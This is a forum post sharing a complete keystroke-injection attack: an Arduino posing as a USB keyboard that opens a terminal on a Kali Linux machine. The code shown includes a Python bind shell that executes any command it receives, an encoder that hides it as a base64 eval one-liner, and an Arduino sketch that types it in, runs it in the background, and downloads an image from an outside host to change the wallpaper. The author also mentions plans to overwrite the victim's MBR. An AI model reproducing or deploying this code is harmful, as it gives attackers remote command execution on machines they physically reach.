Weaponized Arduino (USB HID Attack) for targeting Kali Linux

No replies
NOP
Offline
Neophyte
Joined: 2015/03/05

I recently wrote a very basic HID attack but I decided to take it a step further. I designed USB HID Attack that opens up a gnome terminal(using alt+f2 since Ctrl+alt+t is no longer default on Kali boxes) and runs several commands....

Currently the attack changes the background of the user's wallpaper and shells them using a python shell I wrote that is encoded into Base64. I decided against a reverse shell because if you can plug into the computer with a USB Device you can get on the network...

Here is a demo of an attack. The delays on the attack are set REALLY long because I was having issues with the laptop being too slow.
https://vid.me/e/D7W9?autoplay=1

The attack will eventually overwrite the MBR of the kali install but I'm trying to figure out the best way to handle it. If you're interested in the bootloader's code just ask me and I'll share it with you.

The Python Shell

import socket, subprocess
h = ''
#p = 1338
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((h, p))
s.listen(10)
while 1:
  c, address = s.accept()
  while 1:
    d = c.recv(1024)
    if (d == ""):
      break
    c.send(subprocess.check_output(d, shell=True))
  c.close()
s.close()

The Python Encoder

#!/usr/bin/python
# usage: cat code.py  | ./encodePy > payload
import fileinput, sys, time, base64
code = ''
for l in fileinput.input():
  code = code + l
print "python -c \"import base64;p=1338;eval(compile(base64.b64decode('" + base64.b64encode(code) + "'), '<string>', 'exec'));\""

The Arduino Sketchup
# Note remove the spaces from the wget line. They were added to the URL to prevent image formatting.

void f2Run(char command[]) {
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press(KEY_F2);
  delay(200);
  Keyboard.releaseAll();
  delay(500);
  Keyboard.begin();
  Keyboard.print(command);
  Keyboard.end();
  delay(100);
  Keyboard.press(KEY_RETURN);
  delay(100);
  Keyboard.releaseAll();
  delay(100);
}

void runCommand(char command[]) {
  Keyboard.begin();
  Keyboard.print(command);
  Keyboard.end();
  delay(100);
  Keyboard.press(KEY_RETURN);
  delay(100);
  Keyboard.releaseAll();
  delay(100);
}

void gnomeTerminal() {
  f2Run("gnome-terminal");
  delay(1500);
}

void shell() {
  // python shell
  runCommand("python -c \"import base64;p=1338;eval(compile(base64.b64decode('aW1wb3J0IHNvY2tldCwgc3VicHJvY2VzcwpoID0gJycKI3AgPSAxMzM4CnMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pCnMuc2V0c29ja29wdChzb2NrZXQuU09MX1NPQ0tFVCwgc29ja2V0LlNPX1JFVVNFQUREUiwgMSkKcy5iaW5kKChoLCBwKSkKcy5saXN0ZW4oMTApCndoaWxlIDE6CiAgYywgYWRkcmVzcyA9IHMuYWNjZXB0KCkKICB3aGlsZSAxOgogICAgZCA9IGMucmVjdigxMDI0KQogICAgaWYgKGQgPT0gIiIpOgogICAgICBicmVhawogICAgYy5zZW5kKHN1YnByb2Nlc3MuY2hlY2tfb3V0cHV0KGQsIHNoZWxsPVRydWUpKQogIGMuY2xvc2UoKQpzLmNsb3NlKCkK'), '<string>', 'exec'));\" &");
}

void wallpaper() {
  // Image payloads are too big, sticking with wget.
  runCommand("wget http://   i.imgur.com/3Novb98  .   jpg;gsettings set org.gnome.desktop.background picture-uri file://`pwd`/3Novb98.jpg;gsettings set org.gnome.desktop.background picture-options \"centered\"");
}

void setup() {
  Serial.begin(9600);
}

void loop() {
  delay(3000);
  gnomeTerminal();
  shell();
  wallpaper();
  runCommand("exit");
  delay(60000);
}